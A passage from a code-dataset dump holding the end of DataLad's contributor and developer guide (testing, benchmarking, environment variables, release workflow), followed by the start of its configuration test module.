You can then curate the file as you see fit.\nWe next want to add the .allcontributors file:\n\n```bash\n$ tributors init allcontrib\nINFO:allcontrib:Generating .all-contributorsrc for datalad/datalad\n$ tributors update allcontrib\nINFO:allcontrib:Updating .all-contributorsrc\nINFO:allcontrib:Updating .tributors cache from .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor glalteva in .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor adswa in .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor chrhaeusler in .all-contributorsrc\n...\nINFO:allcontrib:⭐️ Found new contributor bpoldrack in .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor yetanothertestuser in .all-contributorsrc\nWARNING:tributors:allcontrib does not support updating from orcids.\nWARNING:tributors:allcontrib does not support updating from email.\n```\n\nWe can then populate the shared .tributors file:\n\n```bash\n$ tributors update-lookup allcontrib\n```\n\nAnd then we can rely on the [GitHub action](.github/workflows/update-contributors.yml) to update contributors. The action is set to run on merges to master, meaning when the contributions are finalized. This means that we add new contributors, and we\nlook for new orcids as we did above.\n\n## Additional Hints\n\n### Merge commits\n\nFor merge commits to have more informative description, add to your\n`.git/config` or `~/.gitconfig` following section:\n\n [merge]\n log = true\n\nand if conflicts occur, provide short summary on how they were resolved\nin \"Conflicts\" listing within the merge commit\n(see [example](https://github.com/datalad/datalad/commit/eb062a8009d160ae51929998771964738636dcc2)).\n\n\n## Quality Assurance\n\nIt is recommended to check that your contribution complies with the following\nrules before submitting a pull request:\n\n- All public methods should have informative docstrings with sample usage\n presented as doctests when appropriate.\n\n- All other tests pass when everything is rebuilt from scratch.\n\n- New code should be accompanied by tests.\n\nThe documentation contains a [Design Document specifically on running and writing tests](http://docs.datalad.org/en/stable/design/testing.html) that we encourage you to read beforehand.\nFurther hands-on advice is detailed below.\n\n### Tests\n\n`datalad/tests` contains tests for the core portion of the project, and\nmore tests are provided under corresponding submodules in `tests/`\nsubdirectories to simplify re-running the tests concerning that portion\nof the codebase. To execute many tests, the codebase first needs to be\n\"installed\" in order to generate scripts for the entry points. 
For\nthat, the recommended course of action is to use `virtualenv`, e.g.\n\n```sh\nvirtualenv --system-site-packages venv-tests\nsource venv-tests/bin/activate\npip install -r requirements.txt\npython setup.py develop\n```\n\nand then use that virtual environment to run the tests, via\n\n```sh\npytest datalad\n```\n\nthen to later deactivate the virtualenv just simply enter\n\n```sh\ndeactivate\n```\n\nAlternatively, or complimentary to that, you can use `tox` -- there is a `tox.ini`\nfile which sets up a few virtual environments for testing locally, which you can\nlater reuse like any other regular virtualenv for troubleshooting.\nAdditionally, [tools/testing/test_README_in_docker](tools/testing/test_README_in_docker) script can\nbe used to establish a clean docker environment (based on any NtesteuroDebian-supported\nrelease of Debian or Ubuntu) with all dependencies listed in README.md pre-installed.\n\n### CI setup\n\nWe are using several continuous integration services to run our tests battery for every PR and on the default branch.\nPlease note that new a contributor's first PR needs workflow approval from a team member to start the CI runs, but we promise to promptly review and start the CI runs on your PR.\nAs the full CI suite takes a while to complete, we recommend to run at least tests directly related to your contributions locally beforehand.\nLogs from all CI runs are collected periodically by [con/tinuous](https://github.com/con/tinuous/) and archived at `smaug:/mnt/btrfs/datasets/datalad/ci/logs/`.\nFor developing on Windows you can use free [Windows VMs](https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/).\nIf you would like to propose patch against `git-annex` itself, submit them against [datalad/git-annex](https://github.com/datalad/git-annex/#submitting-patches) repository which builds and tests `git-annex`.\n\n### Coverage\n\nYou can also check for common programming errors with the following tools:\n\n- Code with good unittest coverage (at least 80%), check with:\n\n pip install pytest coverage\n pytest --cov=datalad path/to/tests_for_package\n\n- We rely on https://codecov.io to provide convenient view of code coverage.\n Installation of the codecov extension for Firefox/Iceweasel or Chromium\n is strongly advised, since it provides coverage annotation of pull\n requests.\n\n### Linting\n\nWe are not (yet) fully PEP8 compliant, so please use these tools as\nguidelines for your contributions, but not to PEP8 entire code\nbase.\n\n[beyond-pep8]: https://www.youtube.com/watch?v=wf-BqAjZb8M\n\n*Sidenote*: watch [Raymond Hettinger - Beyond PEP 8][beyond-pep8]\n\n- No pyflakes warnings, check with:\n\n pip install pyflakes\n pyflakes path/to/module.py\n\n- No PEP8 warnings, check with:\n\n pip install pep8\n pep8 path/to/module.py\n\n- AutoPEP8 can help you fix some of the easy redundant errors:\n\n pip install autopep8\n autopep8 path/to/pep8.py\n\nAlso, some team developers use\n[PyCharm community edition](https://www.jetbrains.com/pycharm) which\nprovides built-in PEP8 checker and handy tools such as smart\nsplits/joins making it easier to maintain code following the PEP8\nrecommendations. NeuroDebian provides `pycharm-community-sloppy`\npackage to ease pycharm installation even further.\n\n### Benchmarking\n\nWe use [asv] to benchmark some core DataLad functionality.\nThe benchmarks suite is located under [benchmarks/](./benchmarks), and\nperiodically we publish results of running benchmarks on a dedicated host\nto http://datalad.github.io/datalad/ . 
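
If you want to add a benchmark of your own, the following is an illustrative
sketch only (the file name, class name, and method names are made up, not an
excerpt from the existing suite): [asv] picks up classes or functions whose
methods are named `time_*` (or `mem_*`/`peakmem_*`), with optional
`setup`/`teardown` hooks run around the measurements.

```python
# hypothetical benchmarks/example.py -- for illustration only
import tempfile

from datalad.api import Dataset


class example_suite:
    """Toy benchmark: status() on a small, freshly created dataset."""

    def setup(self):
        self.tmpdir = tempfile.TemporaryDirectory()
        self.ds = Dataset(self.tmpdir.name).create()

    def teardown(self):
        self.tmpdir.cleanup()

    def time_status(self):
        # asv times the body of every time_* method
        self.ds.status()
```

Something like `asv run -E existing -b example_suite` would then run just this
benchmark, analogous to the `-b` invocations shown below.
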
Those results are collected\nand available under the `.asv/` submodule of this repository, so to get started\n\n- `git submodule update --init .asv`\n- `pip install .[devel]` or just `pip install asv`\n- `asv machine` - to configure asv for your host if you want to run\n benchmarks locally\n\nAnd then you could use [asv] in multiple ways.\n\n#### Quickly benchmark the working tree\n\n- `asv run -E existing` - benchmark using the existing python environment\n and just print out results (not stored anywhere). You can add `-q`\n to run each benchmark just once (thus less reliable estimates)\n- `asv run -b api.supers.time_createadd_to_dataset -E existing`\n would run that specific benchmark using the existing python environment\n\nNote: `--python=same` (`-E existing`) seems to have restricted\napplicability, e.g. can't be used for a range of commits, so it can't\nbe used with `continuous`.\n\n#### Compare results for two commits from recorded runs\n\nUse [asv compare] to compare results from different runs, which should be\navailable under `.asv/results/<machine>`. (Note that the example\nbelow passes ref names instead of commit IDs, which requires asv v0.3\nor later.)\n\n```shell\n> asv compare -m hopa maint master\n\nAll benchmarks:\n\n before after ratio\n [b619eca4] [7635f467]\n- 1.87s 1.54s 0.82 api.supers.time_createadd\n- 1.85s 1.56s 0.84 api.supers.time_createadd_to_dataset\n- 5.57s 4.40s 0.79 api.supers.time_installr\n 145±6ms 145±6ms 1.00 api.supers.time_ls\n- 4.59s 2.17s 0.47 api.supers.time_remove\n 427±1ms 434±8ms 1.02 api.testds.time_create_test_dataset1\n- 4.10s 3.37s 0.82 api.testds.time_create_test_dataset2x2\n 1.81±0.07ms 1.73±0.04ms 0.96 core.runner.time_echo\n 2.30±0.2ms 2.04±0.03ms ~0.89 core.runner.time_echo_gitrunner\n+ 420±10ms 535±3ms 1.27 core.startup.time_help_np\n 111±6ms 107±3ms 0.96 core.startup.time_import\n+ 334±6ms 466±4ms 1.39 core.startup.time_import_api\n```\n\n\n#### Run and compare results for two commits\n\n[asv continuous] could be used to first run benchmarks for the to-be-tested\ncommits and then provide stats:\n\n- `asv continuous maint master` - would run and compare `maint` and `master` branches\n- `asv continuous HEAD` - would compare `HEAD` against `HEAD^`\n- `asv continuous master HEAD` - would compare `HEAD` against state of master\n- [TODO: continuous -E existing](https://github.com/airspeed-velocity/asv/issues/338#issuecomment-380520022)\n\nNotes:\n- only significant changes will be reported\n- raw results from benchmarks are not stored (use `--record-samples` if\n desired)\n\n#### Run and record benchmarks results (for later comparison etc)\n\n- `asv run` would run all configured branches (see\n [asv.conf.json](./asv.conf.json))\n\n\n#### Profile a benchmark and produce a nice graph visualization\n\nExample (replace with the benchmark of interest)\n\n asv profile -v -o profile.gprof usecases.study_forrest.time_make_studyforrest_mockup\n gprof2dot -f pstats profile.gprof | dot -Tpng -o profile.png \\\n && xdg-open profile.png\n\n#### Common options\n\n- `-E` to restrict to specific environment, e.g. 
`-E virtualenv:2.7`\n- `-b` could be used to specify specific benchmark(s)\n- `-q` to run benchmark just once for a quick assessment (results are\n not stored since too unreliable)\n\n\n[asv compare]: http://asv.readthedocs.io/en/latest/commands.html#asv-compare\n[asv continuous]: http://asv.readthedocs.io/en/latest/commands.html#asv-continuous\n\n[asv]: http://asv.readthedocs.io\n\n\n## Easy Issues\n\nA great way to start contributing to DataLad is to pick an item from the list of\n[Easy issues](https://github.com/datalad/datalad/labels/easy) in the issue\ntracker. Resolving these issues allows you to start contributing to the project\nwithout much prior knowledge. Your assistance in this area will be greatly\nappreciated by the more experienced developers as it helps free up their time to\nconcentrate on other issues.\n\n## Maintenance teams coordination\n\nWe distinguish particular aspects of DataLad's functionality, each corresponding\nto parts of the code base in this repository, and loosely maintain teams assigned\nto these aspects.\nWhile any contributor can tackle issues on any aspect, you may want to refer to\nmembers of such teams (via GitHub tagging or review requests) or the team itself\n(via GitHub issue label ``team-<area>``) when creating a PR, feature request, or bug report.\nMembers of a team are encouraged to respond to PRs or issues within the given area,\nand pro-actively improve robustness, user experience, documentation, and\nperformance of the code.\n\nNew and existing contributors are invited to join teams:\n\n- **core**: core API/commands (@datalad/team-core)\n\n- **git**: Git interface (e.g. GitRepo, protocols, helpers, compatibility) (@datalad/team-git)\n\n- **gitannex**: git-annex interface (e.g. AnnexRepo, protocols, helpers, compatibility) (@datalad/team-gitannex)\n\n- **remotes**: (special) remote implementations (@datalad/team-remotes)\n\n- **runner**: sub-process execution and IO (@datalad/team-runner)\n\n- **services**: interaction with 3rd-party services (create-sibling*, downloaders, credentials, etc.) (@datalad/team-services)\n\n## Recognizing contributions\n\nWe welcome and recognize all contributions from documentation to testing to code development.\n\nYou can see a list of current contributors in our [zenodo file][link_zenodo].\nIf you are new to the project, don't forget to add your name and affiliation there!\nWe also have an .all-contributorsrc that is updated automatically on merges. Once it's\nmerged, if you helped in a non standard way (e.g., a contribution other than code)\nyou can open a pull request to add any [All Contributors Emoji][contrib_emoji] that\nmatch your contribution types.\n\n## Thank you!\n\nYou're awesome. 
:wave::smiley:\n\n\n\n# Various hints for developers\n\n## Useful tools\n\n- While performing IO/net heavy operations use [dstat](http://dag.wieers.com/home-made/dstat)\n for quick logging of various health stats in a separate terminal window:\n \n dstat -c --top-cpu -d --top-bio --top-latency --net\n\n- To monitor speed of any data pipelining [pv](http://www.ivarch.com/programs/pv.shtml) is really handy,\n just plug it in the middle of your pipe.\n\n- For remote debugging epdb could be used (avail in pip) by using\n `import epdb; epdb.serve()` in Python code and then connecting to it with\n `python -c \"import epdb; epdb.connect()\".`\n\n- We are using codecov which has extensions for the popular browsers\n (Firefox, Chrome) which annotates pull requests on github regarding changed coverage.\n\n## Useful Environment Variables\n\nRefer datalad/config.py for information on how to add these environment variables to the config file and their naming convention\n\n- *DATALAD_DATASETS_TOPURL*:\n Used to point to an alternative location for `///` dataset. If running\n tests preferred to be set to https://datasets-tests.datalad.org\n- *DATALAD_LOG_LEVEL*:\n Used for control the verbosity of logs printed to stdout while running datalad commands/debugging\n- *DATALAD_LOG_NAME*:\n Whether to include logger name (e.g. `datalad.support.sshconnector`) in the log\n- *DATALAD_LOG_OUTPUTS*:\n Used to control either both stdout and stderr of external commands execution are logged in detail (at DEBUG level)\n- *DATALAD_LOG_PID*\n To instruct datalad to log PID of the process\n- *DATALAD_LOG_TARGET*\n Where to log: `stderr` (default), `stdout`, or another filename\n- *DATALAD_LOG_TIMESTAMP*:\n Used to add timestamp to datalad logs\n- *DATALAD_LOG_TRACEBACK*:\n Runs TraceBack function with collide set to True, if this flag is set to 'collide'.\n This replaces any common prefix between current traceback log and previous invocation with \"...\"\n- *DATALAD_LOG_VMEM*:\n Reports memory utilization (resident/virtual) at every log line, needs `psutil` module\n- *DATALAD_EXC_STR_TBLIMIT*: \n This flag is used by datalad to cap the number of traceback steps included in exception logging and result reporting to DATALAD_EXC_STR_TBLIMIT of pre-processed entries from traceback.\n- *DATALAD_SEED*:\n To seed Python's `random` RNG, which will also be used for generation of dataset UUIDs to make\n those random values reproducible. You might want also to set all the relevant git config variables\n like we do in one of the travis runs\n- *DATALAD_TESTS_TEMP_KEEP*: \n Function rmtemp will not remove temporary file/directory created for testing if this flag is set\n- *DATALAD_TESTS_TEMP_DIR*: \n Create a temporary directory at location specified by this flag.\n It is used by tests to create a temporary git directory while testing git annex archives etc\n- *DATALAD_TESTS_NONETWORK*: \n Skips network tests completely if this flag is set\n Examples include test for S3, git_repositories, OpenfMRI, etc\n- *DATALAD_TESTS_SSH*: \n Skips SSH tests if this flag is **not** set. If you enable this,\n you need to set up a \"datalad-test\" and \"datalad-test2\" target in\n your SSH configuration. The second target is used by only a couple\n of tests, so depending on the tests you're interested in, you can\n get by with only \"datalad-test\" configured.\n\n A Docker image that is used for DataLad's tests is available at\n <https://github.com/datalad-tester/docker-ssh-target>. 
\n## Useful Environment Variables\n\nRefer to datalad/config.py for information on how to add these environment variables to the config file and their naming convention. A brief illustration follows the list below.\n\n- *DATALAD_DATASETS_TOPURL*:\n Used to point to an alternative location for the `///` dataset. If running\n tests, it is preferred to be set to https://datasets-tests.datalad.org\n- *DATALAD_LOG_LEVEL*:\n Used to control the verbosity of logs printed to stdout while running datalad commands/debugging\n- *DATALAD_LOG_NAME*:\n Whether to include the logger name (e.g. `datalad.support.sshconnector`) in the log\n- *DATALAD_LOG_OUTPUTS*:\n Used to control whether both stdout and stderr of external command execution are logged in detail (at DEBUG level)\n- *DATALAD_LOG_PID*:\n To instruct datalad to log the PID of the process\n- *DATALAD_LOG_TARGET*:\n Where to log: `stderr` (default), `stdout`, or another filename\n- *DATALAD_LOG_TIMESTAMP*:\n Used to add a timestamp to datalad logs\n- *DATALAD_LOG_TRACEBACK*:\n Runs the TraceBack function with collide set to True if this flag is set to 'collide'.\n This replaces any common prefix between the current traceback log and the previous invocation with \"...\"\n- *DATALAD_LOG_VMEM*:\n Reports memory utilization (resident/virtual) at every log line, requires the `psutil` module\n- *DATALAD_EXC_STR_TBLIMIT*: \n This flag is used by datalad to cap the number of traceback steps included in exception logging and result reporting to at most DATALAD_EXC_STR_TBLIMIT pre-processed entries from the traceback.\n- *DATALAD_SEED*:\n To seed Python's `random` RNG, which will also be used for generation of dataset UUIDs to make\n those random values reproducible. You might also want to set all the relevant git config variables\n like we do in one of the travis runs\n- *DATALAD_TESTS_TEMP_KEEP*: \n The function rmtemp will not remove the temporary files/directories created for testing if this flag is set\n- *DATALAD_TESTS_TEMP_DIR*: \n Create a temporary directory at the location specified by this flag.\n It is used by tests to create a temporary git directory while testing git annex archives etc.\n- *DATALAD_TESTS_NONETWORK*: \n Skips network tests completely if this flag is set.\n Examples include tests for S3, git_repositories, OpenfMRI, etc.\n- *DATALAD_TESTS_SSH*: \n Skips SSH tests if this flag is **not** set. If you enable this,\n you need to set up a \"datalad-test\" and \"datalad-test2\" target in\n your SSH configuration. The second target is used by only a couple\n of tests, so depending on the tests you're interested in, you can\n get by with only \"datalad-test\" configured.\n\n A Docker image that is used for DataLad's tests is available at\n <https://github.com/datalad-tester/docker-ssh-target>. Note that\n the DataLad tests assume that target files exist in\n `DATALAD_TESTS_TEMP_DIR`, which restricts the \"datalad-test\" target\n to being either the localhost or a container that mounts\n `DATALAD_TESTS_TEMP_DIR`.\n- *DATALAD_TESTS_NOTEARDOWN*: \n If this flag is set, teardown_package, which cleans up temporary files and directories created by tests, is not executed\n- *DATALAD_TESTS_USECASSETTE*:\n Specifies the location of the file to record network transactions by the VCR module.\n Currently used when testing custom special remotes\n- *DATALAD_TESTS_OBSCURE_PREFIX*:\n A string to prefix the most obscure (but supported by the filesystem) test filename\n- *DATALAD_TESTS_PROTOCOLREMOTE*:\n Binary flag to specify whether to test protocol interactions of the custom remote with annex\n- *DATALAD_TESTS_RUNCMDLINE*:\n Binary flag to specify whether shell testing using shunit2 is to be carried out\n- *DATALAD_TESTS_TEMP_FS*:\n Specify the temporary file system to use as a loop device for testing DATALAD_TESTS_TEMP_DIR creation\n- *DATALAD_TESTS_TEMP_FSSIZE*:\n Specify the size of the temporary file system to use as a loop device for testing DATALAD_TESTS_TEMP_DIR creation\n- *DATALAD_TESTS_NONLO*:\n Specifies network interfaces to bring down/up for testing. Currently used by travis.\n- *DATALAD_TESTS_KNOWNFAILURES_PROBE*:\n Binary flag to test whether \"known failures\" still actually are failures. That\n is, it changes the behavior of tests decorated with any of the `known_failure` decorators\n to not skip, but execute and *fail* if they would pass (indicating that the\n decorator may be removed/reconsidered).\n- *DATALAD_TESTS_GITCONFIG*:\n Additional content to add to `~/.gitconfig` in the tests' `HOME` environment. `\\n` is replaced with `os.linesep`.\n- *DATALAD_TESTS_CREDENTIALS*:\n Set to `system` to allow credentials possibly present in the user/system-wide environment to be used.\n- *DATALAD_CMD_PROTOCOL*:\n Specifies the protocol used by the Runner to note shell command or python function call times and allows for dry runs.\n 'externals-time' for ExecutionTimeExternalsProtocol, 'time' for ExecutionTimeProtocol and 'null' for NullProtocol.\n Any new DATALAD_CMD_PROTOCOL has to implement datalad.support.protocol.ProtocolInterface\n- *DATALAD_CMD_PROTOCOL_PREFIX*:\n Sets a prefix to add before the command call times are noted by DATALAD_CMD_PROTOCOL.\n- *DATALAD_USE_DEFAULT_GIT*:\n Instructs datalad to use `git` as available in the current environment, and not the one which possibly comes with git-annex (the default behavior).\n- *DATALAD_ASSERT_NO_OPEN_FILES*:\n Instructs test helpers to check for open files at the end of a test. If set, remaining open files are logged at ERROR level. Alternative modes are: \"assert\" (raise AssertionError if any open file is found), \"pdb\"/\"epdb\" (drop into debugger when open files are found, info on files is provided in a \"files\" dictionary, mapping filenames to psutil process objects).\n- *DATALAD_ALLOW_FAIL*:\n Instructs the `@never_fail` decorator to allow failures, e.g. to ease debugging.\n
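As the brief illustration promised above: `DATALAD_*` environment variables surface as dot-separated configuration items. This is a minimal sketch patterned after DataLad's own configuration tests; the variable name is invented purely for demonstration:

    import os
    from datalad import cfg

    # hypothetical variable, used only to show the naming convention
    os.environ['DATALAD_DEMO_SETTING'] = 'some-value'
    # the environment is re-read on reload(); the variable then appears
    # as the configuration item 'datalad.demo.setting'
    cfg.reload()
    assert cfg.get('datalad.demo.setting') == 'some-value'
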
\n# Release(s) workflow\n\n## Branches\n\n- `master`: changes toward the next `MAJOR.MINOR.0` release.\n Release candidates (tagged with an `rcX` suffix) are cut from this branch\n- `maint`: bug fixes for the latest released `MAJOR.MINOR.PATCH`\n- `maint-MAJOR.MINOR`: generally not used, unless a bug fix release with a critical fix is needed.\n\n## Workflow\n\n- upon release of `MAJOR.MINOR.0`, the `maint` branch needs to be fast-forwarded to that release\n- bug fixes to functionality released within the `maint` branch should be\n submitted against the `maint` branch\n- cherry-picking fixes from `master` into `maint` is allowed where needed\n- the `master` branch accepts PRs with new functionality\n- the `master` branch merges `maint` as frequently as needed\n\n## Helpers\n\n[Makefile](./Makefile) provides a number of useful `make` targets:\n\n- `linkissues-changelog`: converts `(#ISSUE)` placeholders into proper markdown within [CHANGELOG.md]()\n- `update-changelog`: uses the above `linkissues-changelog` and updates the .rst changelog\n- `release-pypi`: ensures no `dist/` exists yet, creates a wheel and a source distribution, and uploads them to PyPI.\n\n## Releasing with GitHub Actions, auto, and pull requests\n\nNew releases of DataLad are created via a GitHub Actions workflow using [datalad/release-action](https://github.com/datalad/release-action), which was inspired by [`auto`](https://github.com/intuit/auto).\nWhenever a pull request that has the \"`release`\" label is merged into `maint`, that workflow updates the\nchangelog based on the pull requests since the last release, commits the\nresults, tags the new commit with the next version number, and creates a GitHub\nrelease for the tag.\nThis in turn triggers a job for building an sdist & wheel for the project and uploading them to PyPI.\n\n### CHANGELOG entries and labelling pull requests\n\nDataLad uses [scriv](https://github.com/nedbat/scriv/) to maintain [CHANGELOG.md](./CHANGELOG.md).\nAdding the label `CHANGELOG-missing` to a PR triggers a workflow to add a new `scriv` changelog fragment under `changelog.d/` using the PR title as the content.\nThe produced changelog snippet can subsequently be tuned to improve the prospective CHANGELOG entry.\nThe section that the workflow adds to the changelog depends on the `semver-` label added to the PR:\n\n- `semver-minor` — for changes corresponding to an increase in the minor version\n component\n- `semver-patch` — for changes corresponding to an increase in the patch/micro version\n component; this is the default label for unlabelled PRs\n- `semver-internal` — for changes only affecting the internal API\n- `semver-documentation` — for changes only affecting the documentation\n- `semver-tests` — for changes to tests\n- `semver-dependencies` — for updates to dependency versions\n- `semver-performance` — for performance improvements\n\n[link_zenodo]: https://github.com/datalad/datalad/blob/master/.zenodo.json\n[contrib_emoji]: https://allcontributors.org/docs/en/emoji-key\n\n\n## git-annex\n\nEven though git-annex is a separate project, the development of DataLad and git-annex is often intertwined.\n\n## Filing issues\n\nIt is not uncommon to discover potential git-annex bugs or git-annex feature requests while working on DataLad.\nIn those cases, it is common for developers and contributors to file an issue in git-annex's public bug tracker at [git-annex.branchable.com](https://git-annex.branchable.com/).\nHere are a few hints on how to go about it:\n\n- You can report a new bug or browse through existing bug 
reports at [git-annex.branchable.com/bugs](https://git-annex.branchable.com/bugs/))\n- In order to associate a bug report with the DataLad you can add the following mark up into the description: ``[[!tag projects/datalad]]``\n- You can add author metadata with the following mark up: ``[[!meta author=yoh]]``. Some authors will be automatically associated with the DataLad project by git-annex's bug tracker.\n\n## Testing and contributing\n\nTo provide downstream testing of development `git-annex` against DataLad, we maintain the [datalad/git-annex](https://github.com/datalad/git-annex) repository.\nIt provides daily builds of git-annex with CI setup to run git-annex built-in tests and tests of DataLad across all supported operating systems.\nIt also has a facility to test git-annex on *your* client systems following [the instructions](https://github.com/datalad/git-annex/tree/master/clients#testing-git-annex-builds-on-local-clients).\nAll the build logs and artifacts (installer packages etc) for daily builds and releases are collected using [con/tinuous](https://github.com/con/tinuous/) and archived on `smaug:/mnt/btrfs/datasets/datalad/ci/git-annex/`.\nYou can test your fixes for git-annex by submitting patches for it [following instructions](https://github.com/datalad/git-annex#submitting-patches).\n" }, { "alpha_fraction": 0.6258494853973389, "alphanum_fraction": 0.6308821439743042, "avg_line_length": 36.405277252197266, "blob_id": "e5c851e7a2c4f468bab9f582f09ff48982a3db9c", "content_id": "b94d95a9c38e626184246fbc6437e8dcb42ccb81", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31210, "license_type": "permissive", "max_line_length": 398, "num_lines": 834, "path": "/datalad/tests/test_config.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# -*- coding: utf-8 -*-\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\n\"\"\"\n\nimport logging\nimport os\nfrom os.path import exists\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import create\nfrom datalad.cmd import CommandError\nfrom datalad.config import (\n ConfigManager,\n _where_to_scope,\n parse_gitconfig_dump,\n rewrite_url,\n write_config_section,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n assert_equal,\n assert_false,\n assert_in,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_true,\n chpwd,\n ok_file_has_content,\n with_tempfile,\n with_testsui,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n get_home_envvars,\n swallow_logs,\n)\n\n# XXX tabs are intentional (part of the format)!\n# XXX put back! 
confuses pep8\n_config_file_content = \"\"\"\\\n[something]\nuser = name=Jane Doe\nuser = [email protected]\nnovalue\nempty =\nmyint = 3\n\n[onemore \"complicated の beast with.dot\"]\nfindme = 5.0\n\"\"\"\n\ngitcfg_dump = \"\"\"\\\ncore.withdot\ntrue\\0just.a.key\\0annex.version\n8\\0filter.with2dots.some\nlong\\ntext with\\nnewlines\\0annex.something\nabcdef\\0\"\"\"\n\n\n# include a \"command line\" origin\ngitcfg_dump_w_origin = \"\"\"\\\nfile:.git/config\\0core.withdot\ntrue\\0file:.git/config\\0just.a.key\\0file:/home/me/.gitconfig\\0annex.version\n8\\0file:.git/config\\0filter.with2dots.some\nlong\\ntext with\\nnewlines\\0file:.git/config\\0command line:\\0annex.something\nabcdef\\0\"\"\"\n\n\ngitcfg_parsetarget = {\n 'core.withdot': 'true',\n 'just.a.key': None,\n 'annex.version': '8',\n 'filter.with2dots.some': 'long\\ntext with\\nnewlines',\n 'annex.something': 'abcdef',\n}\n\n\n_dataset_config_template = {\n 'ds': {\n '.datalad': {\n 'config': _config_file_content}}}\n\n\ndef test_parse_gitconfig_dump():\n # simple case, no origin info, clean output\n parsed, files = parse_gitconfig_dump(gitcfg_dump)\n assert_equal(files, set())\n assert_equal(gitcfg_parsetarget, parsed)\n # now with origin information in the dump\n parsed, files = parse_gitconfig_dump(gitcfg_dump_w_origin, cwd='ROOT')\n assert_equal(\n files,\n # the 'command line:' origin is ignored\n set((Path('ROOT/.git/config'), Path('/home/me/.gitconfig'))))\n assert_equal(gitcfg_parsetarget, parsed)\n\n # now contaminate the output with a prepended error message\n # https://github.com/datalad/datalad/issues/5502\n # must work, but really needs the trailing newline\n parsed, files = parse_gitconfig_dump(\n \"unfortunate stdout\\non more lines\\n\" + gitcfg_dump_w_origin)\n assert_equal(gitcfg_parsetarget, parsed)\n\n\[email protected](\"ignore: 'where=\\\"dataset\\\"' is deprecated\")\[email protected](\"ignore: 'source=\\\"dataset\\\"' is deprecated\")\n@with_tree(tree=_dataset_config_template)\n@with_tempfile(mkdir=True)\ndef test_something(path=None, new_home=None):\n # will refuse to work on dataset without a dataset\n assert_raises(ValueError, ConfigManager, source='branch')\n # now read the example config\n cfg = ConfigManager(GitRepo(opj(path, 'ds'), create=True), source='branch')\n assert_equal(len(cfg), 5)\n assert_in('something.user', cfg)\n # multi-value\n assert_equal(len(cfg['something.user']), 2)\n assert_equal(cfg['something.user'], ('name=Jane Doe', '[email protected]'))\n\n assert_true(cfg.has_section('something'))\n assert_false(cfg.has_section('somethingelse'))\n assert_equal(sorted(cfg.sections()),\n [u'onemore.complicated の beast with.dot', 'something'])\n assert_true(cfg.has_option('something', 'user'))\n assert_false(cfg.has_option('something', 'us?er'))\n assert_false(cfg.has_option('some?thing', 'user'))\n assert_equal(sorted(cfg.options('something')), ['empty', 'myint', 'novalue', 'user'])\n assert_equal(cfg.options(u'onemore.complicated の beast with.dot'), ['findme'])\n\n assert_equal(\n sorted(cfg.items()),\n [(u'onemore.complicated の beast with.dot.findme', '5.0'),\n ('something.empty', ''),\n ('something.myint', '3'),\n ('something.novalue', None),\n ('something.user', ('name=Jane Doe', '[email protected]'))])\n assert_equal(\n sorted(cfg.items('something')),\n [('something.empty', ''),\n ('something.myint', '3'),\n ('something.novalue', None),\n ('something.user', ('name=Jane Doe', '[email protected]'))])\n\n # by default get last value only\n assert_equal(\n cfg.get('something.user'), '[email 
protected]')\n # but can get all values\n assert_equal(\n cfg.get('something.user', get_all=True),\n ('name=Jane Doe', '[email protected]'))\n assert_raises(KeyError, cfg.__getitem__, 'somedthing.user')\n assert_equal(cfg.getfloat(u'onemore.complicated の beast with.dot', 'findme'), 5.0)\n assert_equal(cfg.getint('something', 'myint'), 3)\n assert_equal(cfg.getbool('something', 'myint'), True)\n # git demands a key without value at all to be used as a flag, thus True\n assert_equal(cfg.getbool('something', 'novalue'), True)\n assert_equal(cfg.get('something.novalue'), None)\n # empty value is False\n assert_equal(cfg.getbool('something', 'empty'), False)\n assert_equal(cfg.get('something.empty'), '')\n assert_equal(cfg.getbool('doesnot', 'exist', default=True), True)\n assert_raises(TypeError, cfg.getbool, 'something', 'user')\n\n # gitpython-style access\n assert_equal(cfg.get('something.myint'), cfg.get_value('something', 'myint'))\n assert_equal(cfg.get_value('doesnot', 'exist', default='oohaaa'), 'oohaaa')\n # weird, but that is how it is\n assert_raises(KeyError, cfg.get_value, 'doesnot', 'exist', default=None)\n\n # modification follows\n cfg.add('something.new', 'の')\n assert_equal(cfg.get('something.new'), u'の')\n # sections are added on demand\n cfg.add('unheard.of', 'fame')\n assert_true(cfg.has_section('unheard.of'))\n comp = cfg.items('something')\n cfg.rename_section('something', 'this')\n assert_true(cfg.has_section('this'))\n assert_false(cfg.has_section('something'))\n # direct comparison would fail, because of section prefix\n assert_equal(len(cfg.items('this')), len(comp))\n # fail if no such section\n with swallow_logs():\n assert_raises(CommandError, cfg.rename_section, 'nothere', 'irrelevant')\n assert_true(cfg.has_option('this', 'myint'))\n cfg.unset('this.myint')\n assert_false(cfg.has_option('this', 'myint'))\n\n # batch a changes\n cfg.add('mike.wants.to', 'know', reload=False)\n assert_false('mike.wants.to' in cfg)\n cfg.add('mike.wants.to', 'eat')\n assert_true('mike.wants.to' in cfg)\n assert_equal(len(cfg['mike.wants.to']), 2)\n\n # set a new one:\n cfg.set('mike.should.have', 'known')\n assert_in('mike.should.have', cfg)\n assert_equal(cfg['mike.should.have'], 'known')\n # set an existing one:\n cfg.set('mike.should.have', 'known better')\n assert_equal(cfg['mike.should.have'], 'known better')\n # set, while there are several matching ones already:\n cfg.add('mike.should.have', 'a meal')\n assert_equal(len(cfg['mike.should.have']), 